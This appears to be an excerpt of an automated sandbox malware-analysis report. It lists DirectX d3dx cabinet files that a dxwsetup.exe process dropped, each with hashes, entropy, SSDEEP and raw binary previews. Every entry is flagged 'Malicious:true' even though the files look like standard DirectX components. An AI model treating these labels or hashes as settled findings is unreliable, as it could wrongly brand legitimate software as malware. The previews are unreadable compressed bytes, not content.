                                                                                              Preview:MSCF............D...............u................#..................P.........$;....d3dx11_42.dll.....P.....$;...d3dx11_42_x86.cat..........$;...d3dx11_42_x86.inf.(........$;...d3dx11_42_x86_xp.inf.c.........$;...AUG2009_d3dx11_42_x86.inf.ix..@ ..CK.[.X.G.....<..: .QQ.9...S@..A.......p..D._M<.A7&F.q.f]c..xD..Wc.....F7..H..b.._.]=T.tbo.......|O}..[U_.U]o.L......(%..V..Nq.(.....=v........R..3.K.......2c....Zm,..+k.%.....2k.e........s3Xx...C....~..P.X..o..~..[*....../A.?...*\Rl.QRX.g.sz<E....g..s..[/s.(5..T..>/.(.9F&;.c|..).k*....6y.7+P..d...U.J.H7(.x.E.B}.1`..Z. .C....lTP...C7....._^h7F..t....T[.V.r.J.....&?F...Pd.6#..H|....).<.....U...g...5..5..RjE.=.sc:...x1..[..w..p...8*."..Y8.....AV...E".A..p...%d."..5d.!..l4..d}..#.A...#;.l.....!.....Xd...!3"...G...d_"...^do![.l..i.& ..,...d}.9#S.....IA.C......E.6..![...dS..#+@6..@.....m..:......v!{..Zd. [.l&..-.....9..C9...}.x..Y9=.F...k.Z^.^...!{...........R...d.._...~2z_O.mXG.._...XkYEI.....^iA.p.....=...wa;...N.6.2

                                                                                              C:\Windows\SysWOW64\directx\websetup\Aug2009_d3dx9_42_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 722496 bytes, 5 files, at 0x44 "d3dx9_42.dll" "d3dx9_42_x86.cat", flags 0x4, ID 7080, number 1, extra bytes 20 in head, 59 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):731664
                                                                                              Entropy (8bit):7.999475174279291
                                                                                              Encrypted:true
                                                                                              SSDEEP:12288:IDTg2rIyRKFAtmsFp1UChyax+LFl9NiHEpMH5Vfe8PIqEqnyA6F56J2:M02fKYVFvhKLFl9NikiH5V28PXyA6GJ2
                                                                                              MD5:9BC8213933598D050827D20A4573486C
                                                                                              SHA1:E6F9BA62756A00C53746419DEA221881AEB336CF
                                                                                              SHA-256:9C96B6FC4DF5C0EFCA9F0D653976772B2B964243214F99066E4CA4AA6DF791DD
                                                                                              SHA-512:A1920D042963CDDA41DF44044DE5B94B4CEE6EFA102F633214E384918D93D2D6A31EB388BDBD00C7E9C199281E3B71CAA5242E9A42E7F0BE27EDF90A3CF6890C
                                                                                              Malicious:true
                                                                                              Preview:MSCF....@.......D...........................@....#..............;...X.........$;....d3dx9_42.dll.....X.....$;...d3dx9_42_x86.cat...........$;...d3dx9_42_x86.inf.,.........$;...d3dx9_42_x86_xp.inf.\.........$;...AUG2009_d3dx9_42_x86.inf.....::..[.... .......5!.P..wO.n..pOc....7...l.c.n..slmk]....]...B..W..D..UJ...P........C.......l8..y^.S.N.I..7%.....].n...d...>.#....zT{6+..X.UB. A*A......u7{0...n. ....d..R....=...D...F.......n..n..~U.]..U.EX, .......A^;...(...<.@#0/..O.!...i.#.C....D...D.cwC.v.y.<+.*..*..g.l....f.k...W...[..I&...M..W.&Z..^..MB...:.LyQv.l.U.=Y..%....8Ls.......-..".U.....s.f.YVvX...-..8T..m...=..9.CN!89....f.2.G.....:s.G...>.......c^.Z..=h.l..Q..w..yc.\i.Z.^...$cw.T.".d`.jhL;.ZqB.L.{...Z....h{=s.....a.4.1../..`....|;I...;...$.m!l'.g..pa.).b0..:.tT...T..{..<..T.....z.....!....,..|.@.../..A.....q.......@.....................|..5...[..p.6....FE.../.609$.....+.Q.f.N3.....L; ..6./.j.4.a*.E2....(G0,...x..5...IBS.._......9.....%0.....

                                                                                              C:\Windows\SysWOW64\directx\websetup\Dec2005_d3dx9_28_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1073496 bytes, 5 files, at 0x44 +A "d3dx9_28_x86.cat" +A "d3dx9_28.dll", flags 0x4, ID 6914, number 1, extra bytes 20 in head, 72 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1082664
                                                                                              Entropy (8bit):7.999121865147412
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:Wa0lNxqf7fg42FhNffA/Lj41q7+YeSFfSKidHVmTJwagz8u:WHXx652fNffm0oleSt3Fwa3u
                                                                                              MD5:B1CCAAFF46FE022439F7DE5EB9EC226F
                                                                                              SHA1:8BB7225DF13E6B449D318E2649AEB45A5F24DAF7
                                                                                              SHA-256:645F8D90B07C69330A8C7C8912D70538411C9A6B2813048DA8AD3C3119487F93
                                                                                              SHA-512:2B59C07584D45705273A975A0223E4443DB190675558AB89D92E1572DE4843BE3D0D1267818B19185E4E438A8BCFA2AF5FB5EF2A119DA270BE4540576FD78C77
                                                                                              Malicious:true
                                                                                              Preview:MSCF....Xa......D...........................Xa...#..............H..............3g. .d3dx9_28_x86.cat..t#........3). .d3dx9_28.dll......#....38. .d3dx9_28_w9x.inf.....x.#....38. .d3dx9_28_x86.inf.......#....38. .dec2005_d3dx9_28_x86.inf...a.>..CK..X.[...C.)...1X..S.I...(M@A.......Pm..;......,.`...=.#v.$("..w.{...yN<?..=k.^..=s...o.jw..et.=..YA..=H.eF..l...,;.17kj....+.jw..Y.ry6..\.Y.4.igecJ...,.g.yp.F.yc.....X...e...L6.....SI..j......."6."...2.... ..+..O$B,..6l. ..B1l.`.....A..rN2..ggf..g..... ..H..Dp$.1..h..X.O..Pi...[LC.L..!d.\....fff................lknfYP@_..|...Q4.!.JBJ..0...Ri[4.=..r<...b.3M/F].._S.J.."......"...P%@...`..l..J.*/.!.3.M.....y.l...TI.d*~8.0fwf.J)M.C.U....<n7......./..&..P.R0...Q.JU..2.`...2.ri....vp:.Lg.:(.....7.H2.p.!....N.).A...bg......$..6.M5Nj.e.U..-9..P..L.5...G5.......A.P.6..6..v.i..6..6........-....`.........&3nN..K.&w.g-c....4K.9..}...U}.."VCf}*b]..B..+.j.D..d5`..k...j...4UR..... ..Ux."].d5g6..l.70&.%J.^...Q.U.5...9..~

                                                                                              C:\Windows\SysWOW64\directx\websetup\Dec2006_d3dx10_00_x64.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 206847 bytes, 5 files, at 0x44 +A "d3dx10_00_x64.cat" +A "d3dx10.dll", flags 0x4, ID 6580, number 1, extra bytes 20 in head, 17 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):216015
                                                                                              Entropy (8bit):7.996946294916653
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:SGo145qtWQt9fL4bBHlKqDfaqaGm3+vqm9/Xx0b6POnzED/RIxeqTk0T:SGo145qtbt1LaeB36/xc6PkV
                                                                                              MD5:681407075E9B19E5EF2218832F6FAD71
                                                                                              SHA1:E4F4D292A36CD9A3034007EF9D2005694307EB52
                                                                                              SHA-256:F9BD5BB083BD55D1D2A690BC66D6D9DA0B1A8B49F09E811E788C030669121118
                                                                                              SHA-512:E983E7DD3F40510816FF3AE836600A186DBA827B484B0C346C20E43E229189A86D4CB5CF219C1FC35B77AB0668866446F6E9206B279931C927D4ED66AD3625F1
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....'......D............................'...#.............................5#a .d3dx10_00_x64.cat..)........}5.h .d3dx10.dll......H.....5T_ .infinst.exe......O.....5.` .d3dx10_00_x64.inf......Q.....5.` .dec2006_d3dx10_00_x64.inf......:..[.... .Vm.....%A.P...?..,..".._.R.&.F.J.J.K.^.^.*..".U.!. ...BvJ...G......(.........C~.b...V...i.Z..O.<.%. .*C...@l....a........XBq..Q.]g..2;..+d.[T[.Q..(ji..*J...........T%.E.5.o3w.;.x.p.+@...JH...JA%*.`.F..^....z..B......D.....*S. \.3....."A%'n..h.f%.E.Ue.T..61....i.....m.X.......Wu...pf.a...............G.B...........$..%....R...`K.x....U,/...aH........S..^..2....h.E.6....B.K.A..........4!@7..........2...].}...".2..Z...!V.......-.6..<...{}......*........o.~.ST.}.O.H.,....U.N.;..g{j.~a...^..7.n#.......SJ....~3}I9.\s.o....u.c;.../...RT....O~.R......L>C....W...K....P..z..........f%........::...vr.hC.Z.5...75+^...........evQ...8....v..)...W{..O/..<$....t...;. t..,&F.]&@.R..3e._.KZ.....C|../...^.p&..`\SVd.......ge..E.

                                                                                              C:\Windows\SysWOW64\directx\websetup\Dec2006_d3dx10_00_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 185760 bytes, 4 files, at 0x44 +A "d3dx10_00_x86.cat" +A "d3dx10.dll", flags 0x4, ID 5461, number 1, extra bytes 20 in head, 14 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):194952
                                                                                              Entropy (8bit):7.9966042762544145
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:x4mJ4SadBGg8IZrdosr2nqOwY7l43gRDlcGgp6VMslgVwxikcBmEi21wx8MqX+dN:xJJ4VWgzZptAqOf6wRD5g0VlgVwxL21I
                                                                                              MD5:75C33157D8A1B123D01B2EAC91573C98
                                                                                              SHA1:E3E65896CE0520413979C0143C3AA9BD3A6A27D3
                                                                                              SHA-256:02DAA8B5AC3752F76C3BFD9A505EBF22B1B4B41E44EB92CE2799033B2330D186
                                                                                              SHA-512:F0F1F1DEA5938E1C7FF2ADF7C8D421C2E68E6D3A8CDF18D0F2F3FE1C6837A4F37B367D2D974C35832D1D85A619948DD0F250C7D6DC4AE39F618F5A2893EAC7DD
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D...............U................#.............................5.a .d3dx10_00_x86.cat...........}5.h .d3dx10.dll............5.` .d3dx10_00_x86.inf............5.` .dec2006_d3dx10_00_x86.inf....9.>..CK..\.K...C..DEA.P.$.......$...%.A.....0 F.Y.s.1#...#..f.......y...}....ZU..jU......SP.=.gB..GQ....>.5.p8.*<%.y3uY.....Xv.....G.S..)/...A.x....@U.GN.....{,.0nI..@.......d.......R..S....s..B.........B...H. ;.. 9..<...nL.5..!..4=.>.o....A..u.i^...dd..x!.....p...@Jn.;H.L...d......&$. ..|<&/;.O...!.A..%##C.RZ...YG....Z.h..ee........+..D...D&.F.....?.a...Io..hg.5..blP..I.......B....`..,.....u..=A...<.%!.8.,.0....b...v.O..a....#.._J....3o.........F..Z {".t\..H..eo..1h.m.0.a....1....Bc..s.^..V..Bq.x...D(.E....@...&......<._..xv......OB....6L......y.. ....$3.....AB.&.cC8C".p.9.,[..mZ...C+....J.....A.04...rY.....7.y..!^....>j.+yj-#.#...h23.e..)....f....k.:@.-..3...,...O..Vl..#....MIK.Yk@j...^!,96O".....T...\.H,IIL....dfXw.u..e.w.F...C...Y).I\....&.[.4.

                                                                                              C:\Windows\SysWOW64\directx\websetup\Dec2006_d3dx9_32_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1568416 bytes, 4 files, at 0x44 +A "d3dx9_32_x86.cat" +A "d3dx9_32.dll", flags 0x4, ID 5512, number 1, extra bytes 20 in head, 105 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1577608
                                                                                              Entropy (8bit):7.999092247669469
                                                                                              Encrypted:true
                                                                                              SSDEEP:49152:VKo9fY3tlVm3JjPueurZ8zQbC88LHhpu97Sm:V13BFurZ8U18uSm
                                                                                              MD5:A5BEAD938AFDC63ADFECC1DAF5049D7F
                                                                                              SHA1:B3D5BF56F6B9BF87C33009A088BA7785B6363B4E
                                                                                              SHA-256:A1CC7603302EE53D54F4353C223D95E223706924D99B864220B13814EF93EEFB
                                                                                              SHA-512:C9244BBCFE60F347EC8785B1A41B6E243153624EA73B16DB4D624239A69FA76D2DF2E54039D8F4D2C495890AC17B676E390F796118B4E16D9F03683247190362
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................................#..............i..............5.a .d3dx9_32_x86.cat..G4.......}5.h .d3dx9_32.dll......f4....5.` .d3dx9_32_x86.inf.M....i4....5.` .dec2006_d3dx9_32_x86.inf.4.$G.@..CK..\.K..?.........7...a....4.... @..LB. `..b..;......{/.;.g7A......}......uv.3.....9X....:.G...`.eT..p...X,..V..C]c.....3^aV......n.*.3..N.0K3s..%.eb...e../...7..$.~.e#+...<....=..U...R...<..I8..H.D..L.. 1.!........np..\...a...D.'....@(:./.A..{...H.e...b...4Y.c.<..P...H..............].;gl.$q.........}..%,.g.....X.C...*HAUZQ1..C.PM.v.\q...T.0Y.3.a.#.\!...O........A)...K....\....PF.X..te...P...B....).).V.(]Jt...A}.S.t|1S#z....\}./.....\..............(..0....'}..N.]......y,..~.R....f.P.E.T....d#.k.b..`P.../..0W.K&....!.!........M......EL&..bBA.b....q.H.Q.5..5..u....{.ka.k.s.PA^.e.5....c#......d...2..).V.e....2.^.;.....L.....s.`.iK...Q..N.Q.%.T......k..M...U...d...H.W..f.I......kF;X..;.%..N.....j.....6......L.T.).JU"["..`....1..........D.QO,..

                                                                                              C:\Windows\SysWOW64\directx\websetup\Feb2005_d3dx9_24_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1007265 bytes, 4 files, at 0x44 +A "d3dx9_24_x86.cat" +A "d3dx9_24.dll", flags 0x4, ID 4987, number 1, extra bytes 20 in head, 69 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1016433
                                                                                              Entropy (8bit):7.998972724711677
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:T/HUK+hlSM4jwe8WpmQUrxiUyULWoF/V++TYrjVdLa1:bHURewe8W4VN8uF/VhMr5s1
                                                                                              MD5:7029866BA46EC477449510BEEE74F473
                                                                                              SHA1:D2F2C21EAB1C277C930A0D2839903ECC55A9B3E8
                                                                                              SHA-256:3D4E48874BDDCD739CF79BF2B3FD195D7C3E861F738DC2EAB19F347545F83068
                                                                                              SHA-512:B8D709775C8D7CA246D0E52FF33017EE9A718B6C97C008181CD0C43DB7E60023D30D2F99A4930EBA124AF2F80452CBF27836D5B87E2968FB0F594ECA1EBF78DD
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....^......D...............{............^...#..............E...7.........E2.. .d3dx9_24_x86.cat...!.7.....E2.. .d3dx9_24.dll......."...92.. .d3dx9_24_w9x.inf......."...92.. .d3dx9_24_x86.inf.(~m.?..CK..\.Y..O..........H.$@..(M..X.. R.I...6...#.^.......{w..}&............{.3..gf.e.....0*`..kFm.......i.`p....X..Y-..7]n^..9...e.(.7..^..V.FO+...v.,e.^..l(i~w...M...l...s...z..U.7.c5.b.3..........#1.I.'.F2.C.@.......'Hx /..K.~.`g.).0..".8y....0.8...N.|..v.u@...P...H.R......c;W....yg..x....s...2..\...}..%21.D..... ...q.....E,.....q.Ee..$...66...pGr}.. +..!&&&PK..f.r...x.'..<.. ....kH..@....~l....\....@fD...+y..:UC.%...zy1.........~j..v..{%..v[S.ZEE...5....i;..1.(...&.x._.......R+[A..l..z(.e. .k..jbf.@.336T.[...'...J/-..uHc.u.....6..U.....).l...&.".9.X..H\.N...d.V.g...^...Jv..PQ~#?....V.......j:..p.....k.R.......0o.~..F..70.).4b7......+.:.&.)Qd(9...i....J35q.....T%..b._....,..........)Qjt.DU.B.R.s..-.`.......4HE...JObJDlG.4x......lb..<..C..sHD.

                                                                                              C:\Windows\SysWOW64\directx\websetup\Feb2006_d3dx9_29_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1078760 bytes, 5 files, at 0x44 +A "d3dx9_29_x86.cat" +A "d3dx9_29.dll", flags 0x4, ID 6921, number 1, extra bytes 20 in head, 72 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1087928
                                                                                              Entropy (8bit):7.99922866964108
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:MWlF24ngnZPhX4ciAwvVHgK6SgHY6OmSfLV+:MWls4gnZTmHx6SgnPCY
                                                                                              MD5:F6CC1C08D0F569B5F59108D39CE3508B
                                                                                              SHA1:E9CF7EDC8C9C4B57A9BADD8386A2117EC5785AAB
                                                                                              SHA-256:4114E76799AF3DA9DB3DAE51305DAD70A05B757E506E4A327092D536CCA7EE75
                                                                                              SHA-512:86DF72D5B15396ACB504C1AC9DE7FF5C0CC9C95A90FDD82DAEDC55BAAD490CC47A71CB511571D37E25DD9BC1EE9652B9723E33879BC1756A7881A8E61EBC59ED
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....u......D............................u...#..............H.............C4.F .d3dx9_29_x86.cat..#.......C4hE .d3dx9_29.dll......#...C4hF .d3dx9_29_w9x.inf.....x.#...C4hF .d3dx9_29_x86.inf.......#...C4iF .feb2006_d3dx9_29_x86.inf.w.6..>..CK..X.[...C.Q...1XQ.N..........T,..D .$....c.]......#..{.z..]..E....}...?......f.=..=.g.....v..]F.Y3j...8...&....V..S=S.f...1]aQ......a...1..Q...V.....m..e........s..m.[c.....yl.{/.^%q.Z.I ..hg..DH..........$..........AB.....!N.w=!F.g. .s.p.B...X...LL..X.c ....z.B...........b.81...>:/b..*.....511A..[.&.3vo.'.V)..kgjb...\..|..!(.i..%#...8..9U*m..]_.E...c.o.{....|j..r4..CN..2....K..].t.E..CH.2b}I.A_.D...5s.e....K..&..*.n.K....a..p.$29...o.HN..[..k...d......1V.....P..9..e.....p9...c=..RQ .7.H61.e ......I~.v.....p}:.1.:r.i....qb..@K.......AM.(.QM....%.p....+.9....~.J~.J~.J~.....-....`.0LLl...3nL.....t.f/...x.9......n....I/!.!V..X........S,OU..`.tt..u$i...*]...`.6...o..(..).-..tD.....L.B.S.+c.:.Z.n......od<..

                                                                                              C:\Windows\SysWOW64\directx\websetup\Jun2005_d3dx9_26_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1058965 bytes, 5 files, at 0x44 +A "d3dx9_26_x86.cat" +A "d3dx9_26.dll", flags 0x4, ID 6937, number 1, extra bytes 20 in head, 71 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1068133
                                                                                              Entropy (8bit):7.999040217820951
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:NxFMsUF1MmwONoWu85w6SFBu+vveJ0sut3z2A1s9z/D8gigA:V3dm3NoW+9FBhuJ9ut36A1s9z78giP
                                                                                              MD5:029359EBCA4BA5945282E0C021B26102
                                                                                              SHA1:6107919F51E1B952CA600F832A6F86CBBED064B5
                                                                                              SHA-256:C44EABF5BE3B87CD845950670C27F6A1E5D92B7758BA7C39C7849B1EE1C649C0
                                                                                              SHA-512:FA007F257F5267119B247EC4ED368E51FD73E6AEA3097E2FC4E78078C063AF34D161FD1BDCAF3097BB575D2614DBA226A624D060009EE4F7BEDA697EFCF42BB7
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....(......D............................(...#..............G...7..........2b} .d3dx9_26_x86.cat...#.7......2Z| .d3dx9_26.dll......,#....2.} .d3dx9_26_w9x.inf......-#....2.} .d3dx9_26_x86.inf......0#....2.} .jun2005_d3dx9_26_x86.inf...N..>..CK..X....'.. ..P.....&!. .%.A........`.....;v..WTd..........w......{.{..<'...3..;}....=Xv3.e.vc:.yg.i.....1.....V.F.:.fMj ,.|.e.....F..5#?.|6.M.j[Z..k3.....g.f.B(..=v......a<.7..a.=.:...h.f.X6.."..I..I......Od:.!9......~1.H..q.....'....y..\...E..u.S|K.a...:c..B..8g:!?._..E:.A.H...N.a..j..~pI.....V.k.l.W.....X..........`4.2(.....e.>...0...!L..>p.....2d..r<...afffPK.6..t0.V.'HA.....j.o...5B+. .....hy...... M..5t...K.<>..@.G........~h..Xw.B.....F~>.?l..7..].}Xp.m.!......x~6.aY_*.rmH..sr.."Q*..]..d3.{.bXX`P....io...AZ.i..$..1....Gl.....d..AM:6.......p./(..Q.1..1..q....O.c~.c........04...|s3...}..x..I.r..).m.K1.o#.Q.Fa...X7.baY......G{......Z5S.HU..c.tp.z6.4m.B=P...d.6...g.....W..aM...z...L.R.W%...z.F.n.5....54EG.R

                                                                                              C:\Windows\SysWOW64\directx\websetup\Jun2007_d3dx10_34_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 692512 bytes, 6 files, at 0x44 +A "d3dx10_34_x86.cat" +A "d3dcompiler_34.dll", flags 0x4, ID 9065, number 1, extra bytes 20 in head, 49 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):701680
                                                                                              Entropy (8bit):7.9989902264021255
                                                                                              Encrypted:true
                                                                                              SSDEEP:12288:SuBBWP1krfKO0BZwB6ux8hBXsRbD3RazqgwLdJPMqHy7qdXCyhUW3zE:DBTrZ0BZwV8fXsprRaxsDBHyWdXg5
                                                                                              MD5:19383CBADA5DF3662303271CC9882314
                                                                                              SHA1:123C97C33F7EF2BA345B220450F181D440412E6B
                                                                                              SHA-256:8EC971C91040618338AC2369188F3E5D7C85A5B1E3B9FC8E752DD845D295CDBA
                                                                                              SHA-512:A4C6ACC9FF656E05D75AE0081C65C200B584209C99FD001494C4D206F2CE8A78D2DD3644E51018574928F3B9E9373BF7EC8C5147A3590B54D1C6D50E61342853
                                                                                              Malicious:true
                                                                                              Preview:MSCF.... .......D...............i#.......... ....#..............1....).........6.. .d3dx10_34_x86.cat.p)...).....6.. .d3dcompiler_34.dll.h...2S.....6.. .d3dx10_34.dll.I..........6.. .d3dx10_34_x86.inf.i..........6.. .d3dx10_34_x86_xp.inf.c...L......6.. .jun2007_d3dx10_34_x86.inf.....{5..CK.|.|......m:..s66...$.\.-K2...B....-.%..\...zI....-.@...!@..<Z(.@..B..@.?..'.k.......f.67;;;;3..gQi....O.7..F....J.m........".z.=.;9.s.D........P...PV.\.U.D......M...3.{K.k>...[z.u#Q...D,..%.%.$j,@wDT..D..]................8\.S.....X*......$....q..pP>.0.8.(q.IQ..;GGq.H.@...z.F...~(...=............W...9....._A.qtt.D:[.......7D...&..N..ee.J....H..LeS,e...CY....K m..9..\....._.e....E..@R..J)p..~e...I......uA..8<>).X.#....P..O.BN...a9#I})RW..J4P./.i.'..v.Po..5.+K...[..+K..2... `]....@............q.($. <B$...8@..b<." ...b.y..,.<..OK.."*..t..q...{^..5..l........J.(Q.o.Yn.]z.:x6.T..J.Z..zG........ .W..-..l.....2.\O..f/.......TJ&W"S$*.2.@.2.a.*....C.......A...{..!.|. ....UVJ7.#.\T..k..

                                                                                              C:\Windows\SysWOW64\directx\websetup\Jun2007_d3dx9_34_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1601326 bytes, 5 files, at 0x44 +A "d3dx9_34_x86.cat" +A "d3dx9_34.dll", flags 0x4, ID 7195, number 1, extra bytes 20 in head, 108 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1610494
                                                                                              Entropy (8bit):7.999066428256981
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:ZBdkB3TM+mIf4qyM0iJRy3QvQDxPYKhatPJZcg9QwJeYX34eq2F37kRVeLbdiL3q:ZPU3TMXxDVI3vQ2KSBP4YH4aAELbdK3q
                                                                                              MD5:FE8FEB215FAE59866DCD68C1604D97AA
                                                                                              SHA1:CEDACA678D15E78AA458B965ABB467E8964A1FAB
                                                                                              SHA-256:1C1E1C6F68BA556A0AF09A38C32EB421C543A4848C4B42D25867C98DAB3B3A50
                                                                                              SHA-512:9955336B561E4FD3BA3DA7FC086643E811048A25A7E68344D2CC5CAB091980BAAE1C04CE41328B59C896662E2875886B78EC869852B2D1DAAA46AF38C894A3F2
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....o......D............................o...#..............l....(.........6.. .d3dx9_34_x86.cat.h_5..(.....6.. .d3dx9_34.dll.......5....6.. .d3dx9_34_x86.inf.,.....5....6.. .d3dx9_34_x86_xp.inf.\...7.5....6.. .jun2007_d3dx9_34_x86.inf.A.".l>..CK..\...;T.D...1.(.`...2CH..........`.UD.....b.;va.;*6...w.{.f.l..9.....w?..=k....=.;..........Zh.....<m--.....^..:.z.#_g.~.>.Z.Z..C..|...5..J.P..JKK.(.0...>+.G..~.hy{c....b2.,..!..?E.&.j.1.u.=.1.B...q...p..>...q.Y....x..\6.uB......>........A..A.f.1..{v.Z...F.F.|:.[.Z!..@$.IA.H""ET.J.c.........d..G.....\...xco.#.G......`k?d..E..s...B,........O.0(?..r.......TD..y.W..FkkkC+i...&..!@... ..xP_>(#!...b.O.>,P.8d......lM>..R-t...[.lm2.WS|.u..._.K/.3.3.~.1a....+*....q....o.M.O>o..Y...O*/..B.y_...V..5..5..$#~.+.H..5.B.tu...../.......|.[.(5q.YT5...II..@K._.d0.@M (.U.p...J.!Q_....5.....O....?].k.)..3.u.an}*.....6A. .]].....rg....Z.0...}...u.....*P$g*eq.*.]t/......e.JE."VE.(...LhNu..(...L!g.0...:m:...V(T4~.*^...2...y

                                                                                              C:\Windows\SysWOW64\directx\websetup\Jun2008_d3dx10_38_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 843959 bytes, 6 files, at 0x44 "d3dx10_38.dll" "D3DCompiler_38.dll", flags 0x4, ID 8962, number 1, extra bytes 20 in head, 61 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):853127
                                                                                              Entropy (8bit):7.998980130768887
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:IKcIh4DqtGLRndZKm4zZTQb4BJ+gfG07QyGeZH:IKc64DgG9dIZTQb4L+GGIGeZH
                                                                                              MD5:B0E2B612DAF28B145B197A4DB0A9B721
                                                                                              SHA1:F69266E4AF3D2DE31A2A2E416F10B0F44737739A
                                                                                              SHA-256:E8DC1063C9434EED8D633741B19CDFA1889581041E2214B87B5159E3EA087F3C
                                                                                              SHA-512:6E31F18CB75CE69D291D0ABD15EDADF02C0693033351DFB2F435312A47540AA223C8176209725C14A05FA6494153A3E191B2FB7CB8C5CEE11FB42371CE67392B
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................#...............#..............=....$.........8wq..d3dx10_38.dll......$.....8wq..D3DCompiler_38.dll.f(..(......8.r..d3dx10_38_x86.cat.I..........8.r..d3dx10_38_x86.inf.i..........8.r..d3dx10_38_x86_xp.inf.c...@......8.r..Jun2008_d3dx10_38_x86.inf...E7%,..CK..\.....\./BS3...$.......p.&..x"........h....J.,5.,._.e....y..-y...#.......YXPP+..y.......y....o*.&..........\....i...YQcs..u.77K.8..h......h..]L...y6.bc..S.\.Y..]..aM.iyo.Xr..2....w...^V.Y.v)..s..w..;..z...........S..WY.b...!....q..W............y.~.x...P..!z.S.....2..{W.x.tJ.....Y....'o5"dE...(...|o.U'.tpJ....8..4.j.vT.+TrVWy.`.P..{![...O.<.!...F...V.........C.k.E.h._..AM..+...E.jG.U.R.F:.].E...Xvw.?....'..,....................A-p...l.[.J....4.. .$.,...`2X.W.c..=Y.>........i.....A-p.?.....`.8..qp.`...A.....P_1.....? ]O....A?P.&........%..c. ..v...,h.=...AK0........k......d..... ....A{....... .|o......&..|......0........d.....[m......X...%C.D.2X.....'&.4..@o......98.~..c

                                                                                              C:\Windows\SysWOW64\directx\websetup\Jun2008_d3dx9_38_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1457918 bytes, 5 files, at 0x44 "d3dx9_38.dll" "d3dx9_38_x86.cat", flags 0x4, ID 7184, number 1, extra bytes 20 in head, 118 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1467086
                                                                                              Entropy (8bit):7.999726422350297
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:HGIly6o6H1kEznWRpKpx5A0SBF/VnjmkC8nAMzh08qF4QH5/RSzsExkqv4Q9hHi0:Hh46Tn/UXVjmiJlO4sVRSzdk5uhCbOka
                                                                                              MD5:E2FB2E37C342983493C776BD81943978
                                                                                              SHA1:2A8F3C45CF979966D4D4D42A4D34F05C72C7E29E
                                                                                              SHA-256:57E57A6348E55AAACA6BED5E27BBDD0A4BD0DDE69C77F4D26C805BE6384BE927
                                                                                              SHA-512:2D297F607C5A098A3D2B19E7F88AA12F720AF3C23FE6DDCE7D4659A9184D1CF8F8A76F35B8ACB639B48CDAD8998C919215A03B89207E2BB1829EA3D8A9EFB95A
                                                                                              Malicious:true
